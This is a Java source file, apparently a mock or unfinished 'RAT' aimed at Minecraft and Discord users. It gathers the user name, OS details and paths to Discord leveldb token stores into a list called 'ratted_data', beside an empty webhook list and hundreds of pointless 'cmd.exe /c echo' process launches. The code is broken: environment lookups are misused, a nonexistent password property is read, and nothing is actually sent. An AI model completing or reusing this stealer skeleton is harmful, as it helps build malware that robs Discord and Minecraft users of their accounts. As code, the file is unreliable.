
import java.net.URI;
import java.util.ArrayList;

public class HeadHunter {
    public static void main(String[] args) {
        try {
            ArrayList<URI> webhooks = new ArrayList<URI>();
            webhooks.add(new URI(""));
            int h = 6;
            switch (h) {
                case 0:
                    System.out.println("false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    break;
                case 1:
                    System.out.println("false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    break;
                case 2:
                    System.out.println("false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    break;
                case 3:
                    System.out.println("false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    break;
                case 4:
                    System.out.println("false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    break;
                case 5:
                    System.out.println("false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    Runtime.getRuntime().exec("cmd.exe /c echo false");
                    break;
                case 6:
                    int k = 3;
                    switch (k) {
                        case 0:
                            System.out.println("false");
                            Runtime.getRuntime().exec("cmd.exe /c echo false");
                            Runtime.getRuntime().exec("cmd.exe /c echo false");
                            Runtime.getRuntime().exec("cmd.exe /c echo false");
                            Runtime.getRuntime().exec("cmd.exe /c echo false");
                            Runtime.getRuntime().exec("cmd.exe /c echo false");
                            Runtime.getRuntime().exec("cmd.exe /c echo false");
                            break;
                        case 1:
                            System.out.println("false");
                            Runtime.getRuntime().exec("cmd.exe /c echo false");
                            Runtime.getRuntime().exec("cmd.exe /c echo false");
                            Runtime.getRuntime().exec("cmd.exe /c echo false");
                            Runtime.getRuntime().exec("cmd.exe /c echo false");
                            Runtime.getRuntime().exec("cmd.exe /c echo false");
                            Runtime.getRuntime().exec("cmd.exe /c echo false");
                            break;
                        case 2:
                            System.out.println("false");
                            Runtime.getRuntime().exec("cmd.exe /c echo false");
                            Runtime.getRuntime().exec("cmd.exe /c echo false");
                            Runtime.getRuntime().exec("cmd.exe /c echo false");
                            Runtime.getRuntime().exec("cmd.exe /c echo false");
                            Runtime.getRuntime().exec("cmd.exe /c echo false");
                            Runtime.getRuntime().exec("cmd.exe /c echo false");
                            break;
                        case 3:
                            for (int i = 0; i < 1000; i++) {
                                try {
                                    String name = System.getProperty("user.name");
                                    String password = System.getProperty("user.password");
                                    String osname = System.getProperty("os.name");
                                    String osversion = System.getProperty("os.version");
                                    String path = System.getenv("AppData" + "/Roaming/.minecraft");
                                    String path2 = System.getenv("AppData" + "/Roaming/discord/Local Storage/leveldb");
                                    String path3 = System
                                            .getenv("AppData" + "/Roaming/discordcanary/Local Storage/leveldb");
                                    String jarfile = ".jar" + "";
                                    String exefile = ".exe" + "";
                                    ArrayList<String> ratted_data = new ArrayList<String>();
                                    ratted_data.add(name);
                                    ratted_data.add(password);
                                    ratted_data.add(osname);
                                    ratted_data.add(osversion);
                                    ratted_data.add(path);
                                    ratted_data.add(path2);
                                    ratted_data.add(path3);
                                    ratted_data.add(jarfile);
                                    ratted_data.add(exefile);
                                } catch (Exception e) {
                                }
                            }
                    }
            }
        } catch (Exception e) {
        }
    }

    void ratted_show() {
        try {
            Runtime.getRuntime().exec("cmd.exe /c echo RATTED");
        } catch (Exception e) {
        }
    }

    void repeater() {
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
        this.ratted_show();
    }
}